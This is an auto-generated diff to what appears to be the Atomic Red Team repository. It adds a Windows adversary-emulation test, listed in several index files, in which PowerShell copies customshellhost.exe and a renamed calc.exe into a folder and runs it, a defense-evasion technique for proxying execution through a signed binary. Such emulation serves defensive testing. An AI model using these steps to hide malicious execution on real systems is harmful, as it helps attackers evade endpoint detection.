Generated docs from job=generate-docs branch=master [ci skip]

atomics/Indexes/Indexes-CSV/index.csv

@@ -163,6 +163,7 @@ defense-evasion,T1218,Signed Binary Proxy Execution,9,Load Arbitrary DLL via Wua
 defense-evasion,T1218,Signed Binary Proxy Execution,10,Lolbin Gpscript logon option,5bcda9cd-8e85-48fa-861d-b5a85d91d48c,command_prompt
 defense-evasion,T1218,Signed Binary Proxy Execution,11,Lolbin Gpscript startup option,f8da74bb-21b8-4af9-8d84-f2c8e4a220e3,command_prompt
 defense-evasion,T1218,Signed Binary Proxy Execution,12,Lolbas ie4uinit.exe use as proxy,13c0804e-615e-43ad-b223-2dfbacd0b0b3,command_prompt
+defense-evasion,T1218,Signed Binary Proxy Execution,13,LOLBAS CustomShellHost to Spawn Process,b1eeb683-90bb-4365-bbc2-2689015782fe,powershell
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -102,6 +102,7 @@ defense-evasion,T1218,Signed Binary Proxy Execution,9,Load Arbitrary DLL via Wua
 defense-evasion,T1218,Signed Binary Proxy Execution,10,Lolbin Gpscript logon option,5bcda9cd-8e85-48fa-861d-b5a85d91d48c,command_prompt
 defense-evasion,T1218,Signed Binary Proxy Execution,11,Lolbin Gpscript startup option,f8da74bb-21b8-4af9-8d84-f2c8e4a220e3,command_prompt
 defense-evasion,T1218,Signed Binary Proxy Execution,12,Lolbas ie4uinit.exe use as proxy,13c0804e-615e-43ad-b223-2dfbacd0b0b3,command_prompt
+defense-evasion,T1218,Signed Binary Proxy Execution,13,LOLBAS CustomShellHost to Spawn Process,b1eeb683-90bb-4365-bbc2-2689015782fe,powershell
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,5,Windows - Modify file creation timestamp with PowerShell,b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c,powershell
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,6,Windows - Modify file last modified timestamp with PowerShell,f8f6634d-93e1-4238-8510-f8a90a20dcf2,powershell
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,7,Windows - Modify file last access timestamp with PowerShell,da627f63-b9bd-4431-b6f8-c5b44d061a62,powershell

atomics/Indexes/Indexes-Markdown/index.md

@@ -226,6 +226,7 @@
   - Atomic Test #10: Lolbin Gpscript logon option [windows]
   - Atomic Test #11: Lolbin Gpscript startup option [windows]
   - Atomic Test #12: Lolbas ie4uinit.exe use as proxy [windows]
+  - Atomic Test #13: LOLBAS CustomShellHost to Spawn Process [windows]
 - T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md)
   - Atomic Test #1: Set a file's access timestamp [linux, macos]

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -151,6 +151,7 @@
   - Atomic Test #10: Lolbin Gpscript logon option [windows]
   - Atomic Test #11: Lolbin Gpscript startup option [windows]
   - Atomic Test #12: Lolbas ie4uinit.exe use as proxy [windows]
+  - Atomic Test #13: LOLBAS CustomShellHost to Spawn Process [windows]
 - T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md)
   - Atomic Test #5: Windows - Modify file creation timestamp with PowerShell [windows]

atomics/Indexes/index.yaml

@@ -8978,6 +8978,35 @@ defense-evasion:
           del %TEMP%\ie4uinit.exe >nul 2>&1
           del %TEMP%\ieuinit.inf >nul 2>&1
         name: command_prompt
+    - name: LOLBAS CustomShellHost to Spawn Process
+      auto_generated_guid: b1eeb683-90bb-4365-bbc2-2689015782fe
+      description: |
+        This test simulates an adversary copying `customshellhost.exe` and `calc.exe` from `C:\windows\system32\` to `C:\temp\`, renaming `calc.exe` to `explorer.exe`.
+        Upon execution, customshellhost.exe will spawn calc.exe.
+        Note this will only work on Windows 10 or 11.
+        [LOLBAS](https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/)
+        [BishopFox](https://bishopfox.com/blog/edr-bypass-with-lolbins)
+      supported_platforms:
+      - windows
+      input_arguments:
+        dest_path:
+          description: Directory to copy files into
+          type: path
+          default: C:\test
+      executor:
+        command: |
+          if (-not (Test-Path #{dest_path})) {
+          New-Item -Path #{dest_path} -ItemType Directory
+          } else {
+          Write-Host "Directory #{dest_path} already exists." }
+          Copy-Item -Path "C:\windows\system32\customshellhost.exe" -Destination "#{dest_path}\customshellhost.exe" -Force
+          Copy-Item -Path "C:\windows\system32\calc.exe" -Destination "#{dest_path}\explorer.exe" -Force
+          #{dest_path}\customshellhost.exe
+        cleanup_command: 'Remove-Item -Path #{dest_path} -Recurse -Force
+
+          '
+        name: powershell
+        elevation_required: true
   T1038:
     technique:
       x_mitre_platforms:

atomics/Indexes/windows-index.yaml

@@ -7316,6 +7316,35 @@ defense-evasion:
           del %TEMP%\ie4uinit.exe >nul 2>&1
           del %TEMP%\ieuinit.inf >nul 2>&1
         name: command_prompt
+    - name: LOLBAS CustomShellHost to Spawn Process
+      auto_generated_guid: b1eeb683-90bb-4365-bbc2-2689015782fe
+      description: |
+        This test simulates an adversary copying `customshellhost.exe` and `calc.exe` from `C:\windows\system32\` to `C:\temp\`, renaming `calc.exe` to `explorer.exe`.
+        Upon execution, customshellhost.exe will spawn calc.exe.
+        Note this will only work on Windows 10 or 11.
+        [LOLBAS](https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/)
+        [BishopFox](https://bishopfox.com/blog/edr-bypass-with-lolbins)
+      supported_platforms:
+      - windows
+      input_arguments:
+        dest_path:
+          description: Directory to copy files into
+          type: path
+          default: C:\test
+      executor:
+        command: |
+          if (-not (Test-Path #{dest_path})) {
+          New-Item -Path #{dest_path} -ItemType Directory
+          } else {
+          Write-Host "Directory #{dest_path} already exists." }
+          Copy-Item -Path "C:\windows\system32\customshellhost.exe" -Destination "#{dest_path}\customshellhost.exe" -Force
+          Copy-Item -Path "C:\windows\system32\calc.exe" -Destination "#{dest_path}\explorer.exe" -Force
+          #{dest_path}\customshellhost.exe
+        cleanup_command: 'Remove-Item -Path #{dest_path} -Recurse -Force
+
+          '
+        name: powershell
+        elevation_required: true
   T1038:
     technique:
       x_mitre_platforms:

atomics/T1218/T1218.md

@@ -30,6 +30,8 @@ Similarly, on Linux systems adversaries may abuse trusted binaries such as <code
 
 - [Atomic Test #12 - Lolbas ie4uinit.exe use as proxy](#atomic-test-12---lolbas-ie4uinitexe-use-as-proxy)
 
+- [Atomic Test #13 - LOLBAS CustomShellHost to Spawn Process](#atomic-test-13---lolbas-customshellhost-to-spawn-process)
+
 
 <br/>
 
@@ -582,4 +584,51 @@ del %TEMP%\ieuinit.inf >nul 2>&1
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #13 - LOLBAS CustomShellHost to Spawn Process
+This test simulates an adversary copying `customshellhost.exe` and `calc.exe` from `C:\windows\system32\` to `C:\temp\`, renaming `calc.exe` to `explorer.exe`.
+Upon execution, customshellhost.exe will spawn calc.exe.
+Note this will only work on Windows 10 or 11.
+[LOLBAS](https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/)
+[BishopFox](https://bishopfox.com/blog/edr-bypass-with-lolbins)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** b1eeb683-90bb-4365-bbc2-2689015782fe
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| dest_path | Directory to copy files into | path | C:&#92;test|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+if (-not (Test-Path #{dest_path})) {
+New-Item -Path #{dest_path} -ItemType Directory
+} else {
+Write-Host "Directory #{dest_path} already exists." }
+Copy-Item -Path "C:\windows\system32\customshellhost.exe" -Destination "#{dest_path}\customshellhost.exe" -Force
+Copy-Item -Path "C:\windows\system32\calc.exe" -Destination "#{dest_path}\explorer.exe" -Force
+#{dest_path}\customshellhost.exe
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item -Path #{dest_path} -Recurse -Force
+```
+
+
+
+
+
 <br/>